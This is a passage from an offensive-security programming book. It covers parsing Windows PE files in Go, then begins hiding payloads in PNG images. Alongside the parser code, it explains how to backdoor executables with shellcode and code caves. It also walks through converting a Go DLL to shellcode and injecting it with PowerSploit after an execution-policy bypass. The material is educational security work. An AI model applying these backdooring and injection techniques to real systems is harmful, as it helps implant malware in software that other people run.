strong following with mobile security practitioners as well as develop- ers: you can use it to perform runtime analysis, in-process debugging, and instrumentation. You can also use Frida with other operating sys- tems, such as Windows. Create your own Go code, inject Frida into a victim process, and use Frida to run JavaScript within the same process. Becoming familiar with the way Frida works will require some research, but we promise it’s well worth it. Windows System Interaction and Analysis 279 The Portable Executable File Sometimes we need a vehicle to deliver our malicious code. This could be a newly minted executable (delivered through an exploit in preexisting code), or a modified executable that already exists on the system, for example. If we wanted to modify an existing executable, we would need to understand the structure of the Windows Portable Executable (PE) file binary data format, as it dictates how to construct an executable, along with the executable’s capabilities. In this section, we’ll cover both the PE data structure and Go’s PE package, and build a PE binary parser, which you can use to navigate the structure of a PE binary. Understanding the PE File Format First, let’s discuss the PE data structure format. The Windows PE file format is a data structure most often represented as an executable, object code, or a DLL. The PE format also maintains references for all resources used during the initial operating system loading of the PE binary, including the export address table (EAT) used to maintain exported functions by ordinal, the export name table used to maintain exported functions by name, the import address table (IAT), import name table, thread local storage, and resource management, among other structures. You can find the PE for- mat specification at https://docs.microsoft.com/en-us/windows/win32/debug /pe-format/. Figure 12-6 shows the PE data structure: a visual representation of a Windows binary. COFF file header Section table DOS stub DOS header Signature 0x5a4d PE header PTR 0x3c Standard fields Data directories Windows-spec fields Optional header 32-bit Optional header 64-bit Figure 12-6: The Windows PE file format We will examine each of these top-down sections as we build out the PE parser. 280 Chapter 12 Writing a PE Parser Throughout the following sections, we will write the individual parser components necessary to analyze each PE section within the Windows binary executable. As an example, we’ll use the PE format associated with the Telegram messaging application binary located at https://telegram.org, since this app is both less trivial than the often overused putty SSH binary example, and is distributed as a PE format. You can use almost any Windows binary executable, and we encourage you to investigate others. Loading the PE binary and File I/O In Listing 12-14, we’ll start by using the Go PE package to prepare the Telegram binary for further parsing. You can place all the code that we create when writing this parser in a single file within a main() function. import ( u "debug/pe" "encoding/binary" "fmt" "io" "log" "os" ) func main() { v f, err := os.Open("Telegram.exe") check(err) w pefile, err := pe.NewFile(f) check(err) defer f.Close() defer pefile.Close() Listing 12-14: File I/O for PE binary (/ch-12/peParser /main.go) Prior to reviewing each of the PE structure components, we need to stub out the initial import u and file I/O by using the Go PE package. We use os.Open() v and then pe.NewFile() w to create a file handle and a PE file object, respectively. This is necessary because we intend to parse the PE file contents by using a Reader object, such as a file or binary reader. Parsing the DOS Header and the DOS Stub The first section of the top-down PE data structure illustrated in Figure 12-6 starts with a DOS header. The following unique value is always present within any Windows DOS-based executable binary: 0x4D 0x5A (or MZ in ASCII), which aptly declares the file as a Windows executable. Another value universally present on all PE files is located at offset 0x3C. The value at this offset points to another offset containing the signature of a PE file: aptly, 0x50 0x45 0x00 0x00 (or PE in ASCII). Windows System Interaction and Analysis 281 The header that immediately follows is the DOS Stub, which always pro- vides the hex values for This program cannot be run in DOS mode; the exception to this occurs when a compiler’s /STUB linker option provides an arbitrary string value. If you take your favorite hex editor and open the Telegram application, it should be similar to Figure 12-7. All of these values are present. Figure 12-7: A typical PE binary format file header So far, we have described the DOS Header and Stub while also looking at the hexadecimal representation through a hex editor. Now, let’s take a look at parsing those same values with Go code, as provided in Listing 12-15. dosHeader := make([]byte, 96) sizeOffset := make([]byte, 4) // Dec to Ascii (searching for MZ) _, err = f.Read(dosHeader) u check(err) fmt.Println("[-----DOS Header / Stub-----]") fmt.Printf("[+] Magic Value: %s%s\n", string(dosHeader[0]), string(dosHeader[1])) v // Validate PE+0+0 (Valid PE format) pe_sig_offset := int64(binary.LittleEndian.Uint32(dosHeader[0x3c:])) w f.ReadAt(sizeOffset[:], pe_sig_offset) x fmt.Println("[-----Signature Header-----]") fmt.Printf("[+] LFANEW Value: %s\n", string(sizeOffset)) /* OUTPUT [-----DOS Header / Stub-----] [+] Magic Value: MZ [-----Signature Header-----] [+] LFANEW Value: PE */ Listing 12-15: Parsing the DOS Header and Stub values (/ch-12/peParser /main.go) 282 Chapter 12 Starting from the beginning of the file, we use a Go file Reader u instance to read 96 bytes onward in order to confirm the initial binary signature v. Recall that the first 2 bytes provide the ASCII value MZ. The PE package offers convenience objects to help marshal PE data structures into something more easily consumable. It will, however, still require man- ual binary readers and bitwise functionality to get it there. We perform a binary read of the offset value w referenced at 0x3c, and then read exactly 4 bytes x composed of the value 0x50 0x45 (PE) followed by 2 0x00 bytes. Parsing the COFF File Header Continuing down the PE file structure, and immediately following the DOS Stub, is the COFF File Header. Let’s parse the COFF File Header by using the code defined in Listing 12-16, and then discuss some of its more inter- esting properties. // Create the reader and read COFF Header u sr := io.NewSectionReader(f, 0, 1<<63-1) v _, err := sr.Seek(pe_sig_offset+4, os.SEEK_SET) check(err) w binary.Read(sr, binary.LittleEndian, &pefile.FileHeader) Listing 12-16: Parsing the COFF File Header (/ch-12 /peParser/main.go) We create a new SectionReader u that starts from the beginning of the file at position 0 and reads to the max value of an int64. Then the sr.Seek() function v resets the position to start reading immediately, following the PE signature offset and value (recall the literal values PE + 0x00 + 0x00). Finally, we perform a binary read w to marshal the bytes into the pefile object’s FileHeader struct. Recall that we created pefile earlier when we called pe.Newfile(). The Go documentation defines type FileHeader with the struct defined in Listing 12-17. This struct aligns quite well with Microsoft’s documented PE COFF File Header format (defined at https://docs.microsoft.com/en-us /windows/win32/debug/pe-format#coff-file-header-object-and-image). type FileHeader struct { Machine uint16 NumberOfSections uint16 TimeDateStamp uint32 PointerToSymbolTable uint32 NumberOfSymbols uint32 SizeOfOptionalHeader uint16 Characteristics uint16 } Listing 12-17: The Go PE package’s native PE File Header struct The single item to note in this struct outside of the Machine value (in other words, the PE target system architecture), is the NumberOfSections property. This property contains the number of sections defined within Windows System Interaction and Analysis 283 the Section Table, which immediately follows the headers. You’ll need to update the NumberOfSections value if you intend to backdoor a PE file by add- ing a new section. However, other strategies may not require updating this value, such as searching other executable sections (such as CODE, .text, and so on) for contiguous unused 0x00 or 0xCC values (a method to locate sec- tions of memory that you can use to implant shellcode), as the number of sections remain unchanged. In closing, you can use the following print statements to output some of the more interesting COFF File Header values (Listing 12-18). // Print File Header fmt.Println("[-----COFF File Header-----]") fmt.Printf("[+] Machine Architecture: %#x\n", pefile.FileHeader.Machine) fmt.Printf("[+] Number of Sections: %#x\n", pefile.FileHeader.NumberOfSections) fmt.Printf("[+] Size of Optional Header: %#x\n", pefile.FileHeader.SizeOfOptionalHeader) // Print section names fmt.Println("[-----Section Offsets-----]") fmt.Printf("[+] Number of Sections Field Offset: %#x\n", pe_sig_offset+6) u // this is the end of the Signature header (0x7c) + coff (20bytes) + oh32 (224bytes) fmt.Printf("[+] Section Table Offset: %#x\n", pe_sig_offset+0xF8) /* OUTPUT [-----COFF File Header-----] [+] Machine Architecture: 0x14c v [+] Number of Sections: 0x8 w [+] Size of Optional Header: 0xe0 x [-----Section Offsets-----] [+] Number of Sections Field Offset: 0x15e y [+] Section Table Offset: 0x250 z */ Listing 12-18: Writing COFF File Header values to terminal output (/ch-12 /peParser/main.go) You can locate the NumberOfSections value by calculating the offset of the PE signature + 4 bytes + 2 bytes—in other words, by adding 6 bytes. In our code, we already defined pe_sig_offset, so we’d just add 6 bytes to that value u. We’ll discuss sections in more detail when we examine the Section Table structure. The produced output describes the Machine Architecture v value of 0x14c: an IMAGE_FILE_MACHINE_I386 as detailed in https://docs.microsoft.com/en-us /windows/win32/debug/pe-format#machine-types. The number of sections w is 0x8, dictating that eight entries exist within the Section Table. The Optional Header (which will be discussed next) has a variable length depending on architecture: the value is 0xe0 (224 in decimal), which corresponds to a 32-bit system x. The last two sections can be considered more of convenience out- put. Specifically, the Sections Field Offset y provides the offset to the num- ber of sections, while the Section Table Offset z provides the offset for the location of the Section Table. Both offset values would require modification if adding shellcode, for example. 284 Chapter 12 Parsing the Optional Header The next header in the PE file structure is the Optional Header. An execut- able binary image will have an Optional Header that provides important data to the loader, which loads the executable into virtual memory. A lot of data is contained within this header, so we’ll cover only a few items in order to get you used to navigating this structure. To get started, we need to perform a binary read of the relevant byte length based on architecture, as described in Listing 12-19. If you were writing more comprehensive code, you’d want to check architectures (for example, x86 versus x86_64) throughout in order to use the appropriate PE data structures. // Get size of OptionalHeader u var sizeofOptionalHeader32 = uint16(binary.Size(pe.OptionalHeader32{})) v var sizeofOptionalHeader64 = uint16(binary.Size(pe.OptionalHeader64{})) w var oh32 pe.OptionalHeader32 x var oh64 pe.OptionalHeader64 // Read OptionalHeader switch pefile.FileHeader.SizeOfOptionalHeader { case sizeofOptionalHeader32: y binary.Read(sr, binary.LittleEndian, &oh32) case sizeofOptionalHeader64: binary.Read(sr, binary.LittleEndian, &oh64) } Listing 12-19: Reading the Optional Header bytes (/ch-12/peParser/main.go) In this code block, we’re initializing two variables, sizeOfOptionalHeader32 u and sizeOfOptionalHeader64 v, with 224 bytes and 240 bytes, respectively. This is an x86 binary, so we’ll use the former variable in our code. Immediately following the variable declarations are initializations of pe.OptionalHeader32 w and pe.OptionalHeader64 x interfaces, which will contain the OptionalHeader data. Finally, we perform the binary read y and marshal it to the relevant data structure: the oh32 based on a 32-bit binary. Let’s describe some of the more notable items of the Optional Header. The corresponding print statements and subsequent output are provided in Listing 12-20. // Print Optional Header fmt.Println("[-----Optional Header-----]") fmt.Printf("[+] Entry Point: %#x\n", oh32.AddressOfEntryPoint) fmt.Printf("[+] ImageBase: %#x\n", oh32.ImageBase) fmt.Printf("[+] Size of Image: %#x\n", oh32.SizeOfImage) fmt.Printf("[+] Sections Alignment: %#x\n", oh32.SectionAlignment) fmt.Printf("[+] File Alignment: %#x\n", oh32.FileAlignment) fmt.Printf("[+] Characteristics: %#x\n", pefile.FileHeader.Characteristics) fmt.Printf("[+] Size of Headers: %#x\n", oh32.SizeOfHeaders) fmt.Printf("[+] Checksum: %#x\n", oh32.CheckSum) fmt.Printf("[+] Machine: %#x\n", pefile.FileHeader.Machine) fmt.Printf("[+] Subsystem: %#x\n", oh32.Subsystem) fmt.Printf("[+] DLLCharacteristics: %#x\n", oh32.DllCharacteristics) Windows System Interaction and Analysis 285 /* OUTPUT [-----Optional Header-----] [+] Entry Point: 0x169e682 u [+] ImageBase: 0x400000 v [+] Size of Image: 0x3172000 w [+] Sections Alignment: 0x1000 x [+] File Alignment: 0x200 y [+] Characteristics: 0x102 [+] Size of Headers: 0x400 [+] Checksum: 0x2e41078 [+] Machine: 0x14c [+] Subsystem: 0x2 [+] DLLCharacteristics: 0x8140 */ Listing 12-20: Writing Optional Header values to terminal output (/ch-12 /peParser/main.go) Assuming that the objective is to backdoor a PE file, you’ll need to know both the ImageBase v and Entry Point u in order to hijack and memory jump to the location of the shellcode or to a new section defined by the number of Section Table entries. The ImageBase is the address of the first byte of the image once it is loaded into memory, whereas the Entry Point is the address of the executable code relative to the ImageBase. The Size of Image w is the actual size of the image, in its entirety, when loaded into memory. This value will need to be adjusted to accommodate any increase in image size, which could happen if you added a new section containing shellcode. The Sections Alignment x will provide the byte alignment when sec- tions are loaded into memory: 0x1000 is a rather standard value. The File Alignment y provides the byte alignment of the sections on raw disk: 0x200 (512K) is also a common value. You’ll need to modify these values in order to get working code, and you’ll have to use a hex editor and a debugger if you’re planning to perform all this manually. The Optional Header contains numerous entries. Instead of describing every single one of them, we recommend that you explore the documentation at https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#optional-header -windows-specific-fields-image-only to gain a comprehensive understanding of each entry. Parsing the Data Directory At runtime, the Windows executable must know important information, such as how to consume a linked DLL or how to allow other application processes to consume resources that the executable has to offer. The binary also needs to manage granular data, such as thread storage. This is the primary function of the Data Directory. The Data Directory is the last 128 bytes of the Optional Header and pertains specifically to a binary image. We use it to maintain a table of references containing both an individual directory’s offset address to the data location and the size of the data. Exactly 16 directory entries are defined within the WINNT.H header, which is a core Windows header file 286 Chapter 12 that defines various data types and constants to be used throughout the Windows operating system. Note that not all of the directories are in use, as some are reserved or unimplemented by Microsoft. The entire list of data directories and details of their intended use can be referenced at https://docs.microsoft.com/en-us /windows/win32/debug/pe-format#optional-header-data-directories-image-only. Again, a lot of information is associated with each individual directory, so we recommend you take some time to really research and get familiar with their structures. Let’s explore a couple of directory entries within the Data Directory by using the code in Listing 12-21. // Print Data Directory fmt.Println("[-----Data Directory-----]") var winnt_datadirs = []string{ u "IMAGE_DIRECTORY_ENTRY_EXPORT", "IMAGE_DIRECTORY_ENTRY_IMPORT", "IMAGE_DIRECTORY_ENTRY_RESOURCE", "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "IMAGE_DIRECTORY_ENTRY_SECURITY", "IMAGE_DIRECTORY_ENTRY_BASERELOC", "IMAGE_DIRECTORY_ENTRY_DEBUG", "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "IMAGE_DIRECTORY_ENTRY_TLS", "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "IMAGE_DIRECTORY_ENTRY_IAT", "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "IMAGE_NUMBEROF_DIRECTORY_ENTRIES", } for idx, directory := range oh32.DataDirectory { v fmt.Printf("[!] Data Directory: %s\n", winnt_datadirs[idx]) fmt.Printf("[+] Image Virtual Address: %#x\n", directory.VirtualAddress) fmt.Printf("[+] Image Size: %#x\n", directory.Size) } /* OUTPUT [-----Data Directory-----] [!] Data Directory: IMAGE_DIRECTORY_ENTRY_EXPORT w [+] Image Virtual Address: 0x2a7b6b0 x [+] Image Size: 0x116c y [!] Data Directory: IMAGE_DIRECTORY_ENTRY_IMPORT z [+] Image Virtual Address: 0x2a7c81c [+] Image Size: 0x12c --snip-- */ Listing 12-21: Parsing the Data Directory for address offset and size ( /ch-12/peParser/main.go) The Data Directory list u is statically defined by Microsoft, meaning that the literal individual directory names will remain in a consistently ordered list. As such, they are considered to be constants. We will use a Windows System Interaction and Analysis 287 slice variable, winnt_datadirs, to store the individual directory entries so we can reconcile names to index positions. Specifically, the Go PE package implements the Data Directory as a struct object, so we’re required to iter- ate over each entry to extract the individual directory entries, along with their respective address offset and size attributes. The for loop is 0-index based, so we just output each slice entry relative to its index position v. The directory entries being displayed to standard output are the IMAGE _DIRECTORY_ENTRY_EXPORT w, or the EAT, and the IMAGE_DIRECTORY_ENTRY_IMPORT z, or the IAT. Each of these directories maintains a table of exported and imported functions, respectively, relative to the running Windows execut- able. Looking further at IMAGE_DIRECTORY_ENTRY_EXPORT, you will see the virtual address x containing the offset of the actual table data, along with the size y of the data contained within. Parsing the Section Table The Section Table, the last PE byte structure, immediately follows the Optional Header. It contains the details of each relevant section in the Windows execut- able binary, such as executable code and initialized data location offsets. The number of entries matches the NumberOfSections defined within the COFF File Header. You can locate the Section Table at the PE signature offset + 0xF8. Let’s take a look at this section within a hex editor (Figure 12-8). Figure 12-8: The Section Table, as observed using a hex editor This particular Section Table starts with .text, but it might start with a CODE section, depending on the binary’s compiler. The .text (or CODE) section contains the executable code, whereas the next section, .rodata, contains read-only constant data. The .rdata section contains resource data, and the .data section contains initialized data. Each section is at least 40 bytes in length. You can access the Section Table within the COFF File Header. You can also access each section individually, using the code in Listing 12-22. 288 Chapter 12 s := pefile.Section(".text") fmt.Printf("%v", *s) /* Output {{.text 25509328 4096 25509376 1024 0 0 0 0 1610612768} [] 0xc0000643c0 0xc0000643c0} */ Listing 12-22: Parsing a specific section from the Section Table (/ch-12 /peParser/main.go) The other option is to iterate over the entire Section Table, as shown in Listing 12-23. fmt.Println("[-----Section Table-----]") for _, section := range pefile.Sections { u fmt.Println("[+] --------------------") fmt.Printf("[+] Section Name: %s\n", section.Name) fmt.Printf("[+] Section Characteristics: %#x\n", section.Characteristics) fmt.Printf("[+] Section Virtual Size: %#x\n", section.VirtualSize) fmt.Printf("[+] Section Virtual Offset: %#x\n", section.VirtualAddress) fmt.Printf("[+] Section Raw Size: %#x\n", section.Size) fmt.Printf("[+] Section Raw Offset to Data: %#x\n", section.Offset) fmt.Printf("[+] Section Append Offset (Next Section): %#x\n", section.Offset+section.Size) } /* OUTPUT [-----Section Table-----] [+] -------------------- [+] Section Name: .text v [+] Section Characteristics: 0x60000020 w [+] Section Virtual Size: 0x1853dd0 x [+] Section Virtual Offset: 0x1000 y [+] Section Raw Size: 0x1853e00 z [+] Section Raw Offset to Data: 0x400 { [+] Section Append Offset (Next Section): 0x1854200 | [+] -------------------- [+] Section Name: .rodata [+] Section Characteristics: 0x60000020 [+] Section Virtual Size: 0x1b00 [+] Section Virtual Offset: 0x1855000 [+] Section Raw Size: 0x1c00 [+] Section Raw Offset to Data: 0x1854200 [+] Section Append Offset (Next Section): 0x1855e00 --snip-- */ Listing 12-23: Parsing all sections from a Section Table (/ch-12/peParser /main.go) Here, we’re iterating over all the sections within the Section Table u and writing the name v, virtual size x, virtual address y, raw size z, and raw offset { to standard output. Also, we calculate the next 40-byte off- set address | in the event that we’d want to append a new section. The characteristics value w describes how the section is to behave as part of the binary. For example, the .text section provides a value of 0x60000020. Windows System Interaction and Analysis 289 Referencing the relevant Section Flags data at https://docs.microsoft.com/en-us /windows/win32/debug/pe-format#section-flags (Table 12-2), we can see that three separate attributes make up the value. Table 12-2: Characteristics of Section Flags Flag Value Description IMAGE_SCN_CNT_CODE 0x00000020 The section contains executable code. IMAGE_SCN_MEM_EXECUTE 0x20000000 The section can be executed as code. IMAGE_SCN_MEM_READ 0x40000000 The section can be read. The first value, 0x00000020 (IMAGE_SCN_CNT_CODE), states that the section contains executable code. The second value, 0x20000000 (IMAGE_SCN_MEM _EXECUTE), states that the section can be executed as code. Lastly, the third value, 0x40000000 (IMAGE_SCN_MEM_READ), allows the section to be read. Therefore, adding all these together provides the value 0x60000020. If you’re adding a new section, keep in mind that you’ll need to update all these properties with their appropriate values. This wraps up our discussion of the PE file data structure. It was a brief overview, we know. Each section could be its own chapter. However, it should be enough to allow you to use Go as a means to navigate arbitrary data struc- tures. The PE data structure is quite involved and it’s well worth the time and effort necessary to become familiar with all of its components. Additional Exercises Take the knowledge you just learned about the PE file data structure and expand upon it. Here are some additional ideas that will help reinforce your understanding, while also providing a chance to explore more of the Go PE package: • Obtain various Windows binaries and use a hex editor and a debugger to explore the various offset values. Identify how various binaries are differ- ent, such as their number of sections. Use the parser that you built in this chapter to both explore and verify your manual observations. • Explore new areas of the PE file structure, such as the EAT and IAT. Now, rebuild the parser to support DLL navigation. • Add a new section to an existing PE file to include your shiny new shell- code. Update the entire section to include the appropriate number of sections, entry point, and raw and virtual values. Do this all over again, but this time, instead of adding a new section, use an existing section and create a code cave. • One topic that we didn’t discuss was how to handle PE files that have been code packed, either with common packers, such as UPX, or more obscure packers. Find a binary that has been packed, identify how it was packed and what packer was used, and then research the appropri- ate technique to unpack the code. 290 Chapter 12 Using C with Go Another method of accessing the Windows API is to leverage C. By directly using C, you could take advantage of an existing library that is available only in C, create a DLL (which we can’t do using Go alone), or simply call the Windows API. In this section, we’ll first install and configure a C tool- chain that is compatible with Go. We will then look at examples of how to use C code in Go programs and how to include Go code in C programs. Installing a C Windows Toolchain To compile programs that contain a combination of Go and C, you’ll need a suitable C toolchain that can be used to build portions of C code. On Linux and macOS, you can install the GNU Compiler Collection (GCC) by using a package manager. On Windows, installing and configuring a tool- chain is a bit more involved and can lead to frustration if you’re not familiar with the many options available. The best option we found is to use MSYS2, which packages MinGW-w64, a project created to support the GCC tool- chain on Windows. Download and install this from https://www.msys2.org/ and follow the instructions on that page to install your C toolchain. Also, remember to add the compiler to your PATH variable. Creating a Message Box Using C and the Windows API Now that we have a C toolchain configured and installed, let’s look at a simple Go program that leverages embedded C code. Listing 12-24 contains C that uses the Windows API to create a message box, which gives us a visual dis- play of the Windows API in use. package main u /* #include <stdio.h> #include <windows.h> v void box() { MessageBox(0, "Is Go the best?", "C GO GO", 0x00000004L); } */ w import "C" func main() { x C.box() } Listing 12-24: Go using C (/ch-12/messagebox /main.go) Windows System Interaction and Analysis 291 C code can be provided through external file include statements u. It can also be embedded directly in a Go file. Here we are using both methods. To embed C code into a Go file, we use a comment, inside of which we define a function that will create a MessageBox v. Go supports comments for many compile-time options, including compiling C code. Immediately after the closing comment tag, we use import "C" to tell the Go compiler to use CGO, a package that allows the Go compiler to link native C code at build time w. Within the Go code, we can now call functions defined in C, and we call the C.box() function, which executes the function defined in the body of our C code x. Build the sample code by using go build. When executed, you should get a message box. N O T E Though the CGO package is extremely convenient, allowing you to call C libraries from Go code as well as call Go libraries from C code, using it gets rid of Go’s memory man- ager and garbage disposal. If you want to reap the benefits of Go’s memory manager, you should allocate memory within Go and then pass it to C. Otherwise, Go’s memory manager won’t know about allocations you’ve made using the C memory manager, and those allocations won’t be freed unless you call C’s native free() method. Not freeing the memory correctly can have adverse effects on your Go code. Finally, just like opening file handles in Go, use defer within your Go function to ensure that any C memory that Go references is garbage collected. Building Go into C Just as we can embed C code into Go programs, we can embed Go code into C programs. This is useful because, as of this writing, the Go compiler can’t build our programs into DLLs. That means we can’t build utilities such as reflective DLL injection payloads (like the one we created earlier in this chapter) with Go alone. However, we can build our Go code into a C archive file, and then use C to build the archive file into a DLL. In this section, we’ll build a DLL by converting our Go code into a C archive file. Then we’ll convert that DLL into shellcode by using existing tools, so we can inject and execute it in memory. Let’s start with the Go code (Listing 12-25), saved in a file called main.go. package main u import "C" import "fmt" v //export Start w func Start() { fmt.Println("YO FROM GO") } x func main() { } Listing 12-25: The Go payload (/ch-12/dllshellcode /main.go) 292 Chapter 12 We import C to include CGO into our build u. Next, we use a comment to tell Go that we want to export a function in our C archive v. Finally, we define the function we want to convert into C w. The main() function x can remain empty. To build the C archive, execute the following command: > go build -buildmode=c-archive We should now have two files, an archive file called dllshellcode.a and an associated header file called dllshellcode.h. We can’t use these quite yet. We have to build a shim in C and force the compiler to include dllshellcode.a. One elegant solution is to use a function table. Create a file that contains the code in Listing 12-26. Call this file scratch.c. #include "dllshellcode.h" void (*table[1]) = {Start}; Listing 12-26: A function table saved in the scratch.c file (/ch-12/dllshellcode/scratch.c) We can now use GCC to build the scratch.c C file into a DLL by using the following command: > gcc -shared -pthread -o x.dll scratch.c dllshellcode.a -lWinMM -lntdll -lWS2_32 To convert our DLL into shellcode, we’ll use sRDI (https://github.com /monoxgas/sRDI/), an excellent utility that has a ton of functionality. To begin, download the repo by using Git on Windows and, optionally, a GNU/Linux machine, as you may find GNU/Linux to be a more readily available Python 3 environment. You’ll need Python 3 for this exercise, so install it if it’s not already installed. From the sRDI directory, execute a python3 shell. Use the following code to generate a hash of the exported function: >>> from ShellCodeRDI import * >>> HashFunctionName('Start') 1168596138 The sRDI tools will use the hash to identify a function from the shell- code we’ll generate later. Next, we’ll leverage PowerShell utilities to generate and execute shell- code. For convenience, we will use some utilities from PowerSploit (https:// github.com/PowerShellMafia/PowerSploit/), which is a suite of PowerShell utili- ties we can leverage to inject shellcode. You can download this using Git. From the PowerSploit\CodeExecution directory, launch a new PowerShell shell: c:\tools\PowerSploit\CodeExecution> powershell.exe -exec bypass Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. Windows System Interaction and Analysis 293 Now import two PowerShell modules from PowerSploit and sRDI: PS C:\tools\PowerSploit\CodeExecution> Import-Module .\Invoke-Shellcode.ps1 PS C:\tools\PowerSploit\CodeExecution> cd ..\..\sRDI PS C:\tools\sRDI> cd .\PowerShell\ PS C:\tools\sRDI\PowerShell> Import-Module .\ConvertTo-Shellcode.ps1 With both modules imported, we can use ConvertTo-Shellcode from sRDI to generate shellcode from the DLL, and then pass this into Invoke-Shellcode from PowerSploit to demonstrate the injection. Once this executes, you should observe your Go code executing: PS C:\tools\sRDI\PowerShell> Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File C:\Users\tom\Downloads\x.dll -FunctionHash 1168596138) Injecting shellcode into the running PowerShell process! Do you wish to carry out your evil plans? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y YO FROM GO The message YO FROM Go indicates that we have successfully launched our Go payload from within a C binary that was converted into shellcode. This unlocks a whole host of possibilities. Summary That was quite a lot to discuss, and yet it just scratches the surface. We started the chapter with a brief discussion about navigating the Windows API documentation so you’d be familiar with reconciling Windows objects to usable Go objects: these include functions, parameters, data types, and return values. Next, we discussed the use of uintptr and unsafe.Pointer to perform disparate type conversions necessary when interacting with the Go syscall package, along with the potential pitfalls to avoid. We then tied everything together with a demonstration of process injection, which used various Go system calls to interact with Windows process internals. From there, we discussed the PE file format structure, and then built a parser to navigate the different file structures. We demonstrated various Go objects that make navigating the binary PE file a bit more convenient and finished up with notable offsets that may be interesting when backdooring a PE file. Lastly, you built a toolchain to interoperate with Go and native C code. We briefly discussed the CGO package while focusing on creating C code examples and exploring novel tools for creating native Go DLLs. Take this chapter and expand on what you’ve learned. We urge you to continuously build, break, and research the many attack disciplines. The Windows attack surface is constantly evolving, and having the right knowledge and tooling will only help to make the adversarial journey more attainable. The word steganography is a combination of the Greek words steganos, which means to cover, conceal, or protect, and graphien, which means to write. In security, steganography refers to techniques and procedures used to obfuscate (or hide) data by implanting it within other data, such as an image, so it can be extracted at a future point in time. As part of the security community, you’ll explore this practice on a routine basis by hiding payloads that you’ll recover after they are delivered to the target. In this chapter, you’ll implant data within a Portable Network Graphics (PNG) image. You’ll first explore the PNG format and learn how to read PNG data. You’ll then implant your own data into the existing image. Finally, you’ll explore XOR, a method for encrypting and decrypting your implanted data. 13 H IDING DATA W I T H S T EG A NOG R A PH Y 296 Chapter 13 Exploring the PNG Format Let’s start by reviewing the PNG specification, which will help you under- stand the PNG image format and how to implant data into a file. You can find its technical specification at http://www.libpng.org/pub/png/spec/1.2 /PNG-Structure.html. It provides details about the byte format of a binary PNG image file, which is made up of repetitive byte chunks. Open a PNG file within a hex editor and navigate through each of the relevant byte chunk components to see what each does. We’re using the native hexdump hex editor on Linux, but any hex editor should work. You can find the sample image that we’ll open at https://github.com/blackhat-go/ bhg/blob /master/ch-13/imgInject/images/battlecat.png; however, all valid PNG images will follow the same format. The Header The first 8 bytes of the image file, 89 50 4e 47 0d 0a 1a 0a, highlighted in Figure 13-1, are called the header. Figure 13-1: The PNG file’s header The second, third, and fourth hex values literally read PNG when con- verted to ASCII. The arbitrary trailing bytes consist of both DOS and Unix Carriage-Return Line Feed (CRLF). This specific header sequence, referred to as a file’s magic bytes, will be identical in every valid PNG file. The variations in content occur in the remaining chunks, as you’ll soon see. As we work through this spec, let’s start to build a representation of the PNG format in Go. It’ll help us expedite our end goal of embedding payloads. Since the header is 8 bytes long, it can be packed into a uint64 data type, so let’s go ahead and build a struct called Header that will hold the value (Listing 13-1). (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) //Header holds the first UINT64 (Magic Bytes) type Header struct { Header uint64 } Listing 13-1: Header struct definition (/ch-13 /imgInject/pnglib/commands.go) Hiding Data with Steganography 297 The Chunk Sequence The remainder of the PNG file, shown in Figure 13-2, is composed of repeat- ing byte chunks that follow this pattern: SIZE (4 bytes), TYPE (4 bytes), DATA (any number of bytes), and CRC (4 bytes). Figure 13-2: The pattern of the chunks used for the remainder of the image data Reviewing the hex dump in further detail, you can see that the first chunk—the SIZE chunk—consists of bytes 0x00 0x00 0x00 0x0d. This chunk defines the length of the DATA chunk that’ll follow. The hexadecimal conver- sion to ASCII is 13—so this chunk dictates that the DATA chunk will consist of 13 bytes. The TYPE chunk’s bytes, 0x49 0x48 0x44 0x52, convert to an ASCII value of IHDR in this case. The PNG spec defines various valid types. Some of these types, such as IHDR, are used to define image metadata or signal the end of an image data stream. Other types, specifically the IDAT type, contain the actual image bytes. Next is the DATA chunk, whose length is defined by the SIZE chunk. Finally, the CRC chunk concludes the overall chunk segment. It consists of a CRC-32 checksum of the combined TYPE and DATA bytes. This particular CRC chunk’s bytes are 0x9a 0x76 0x82 0x70. This format repeats itself throughout the entire image file until you reach an End of File (EOF) state, indicated by the chunk of type IEND. Just as you did with the Header struct in Listing 13-1, build a struct to hold the values of a single chunk, as defined in Listing 13-2. //Chunk represents a data byte chunk segment type Chunk struct { Size uint32 Type uint32 Data []byte CRC uint32 } Listing 13-2: Chunk struct definition (/ch-13/imgInject /pnglib/commands.go) 298 Chapter 13 Reading Image Byte Data The Go language handles binary data reads and writes with relative ease, thanks in part to the binary package (which you may remember from Chapter 6), but before you can parse PNG data, you’ll need to open a file for reading. Let’s create a PreProcessImage() function that will consume a file handle of type *os.File and return a type of *bytes.Reader (Listing 13-3). //PreProcessImage reads to buffer from file handle func PreProcessImage(dat *os.File) (*bytes.Reader, error) { u stats, err := dat.Stat() if err != nil { return nil, err } v var size = stats.Size() b := make([]byte, size) w bufR := bufio.NewReader(dat) _, err = bufR.Read(b) bReader := bytes.NewReader(b) return bReader, err } Listing 13-3: The PreProcessImage() function definition (/ch-13/imgInject/utils/reader.go) The function opens a file object in order to obtain a FileInfo structure u used to grab size information v. Immediately following are a couple of lines of code used to instantiate a Reader instance via bufio.NewReader() and then a *bytes.Reader instance via a call to bytes.NewReader() w. The func- tion returns a *bytes.Reader, which positions you to start using the binary package to read byte data. You’ll first read the header data and then read the chunk sequence. Reading the Header Data To validate that the file is actually a PNG file, use the first 8 bytes, which define a PNG file, to build the validate() method (Listing 13-4). func (mc *MetaChunk) validate(b *bytes.Reader) { var header Header if err := binary.Read(b, binary.BigEndian, &header.Header)u; err != nil { log.Fatal(err) } bArr := make([]byte, 8) binary.BigEndian.PutUint64(bArr, header.Header)v if string(bArr[1:4])w != "PNG" { log.Fatal("Provided file is not a valid PNG format") Hiding Data with Steganography 299 } else { fmt.Println("Valid PNG so let us continue!") } } Listing 13-4: Validating that the file is a PNG file (/ch-13/imgInject/pnglib/commands.go) Although this method may not seem overly complex, it introduces a couple of new items. The first, and the most obvious one, is the 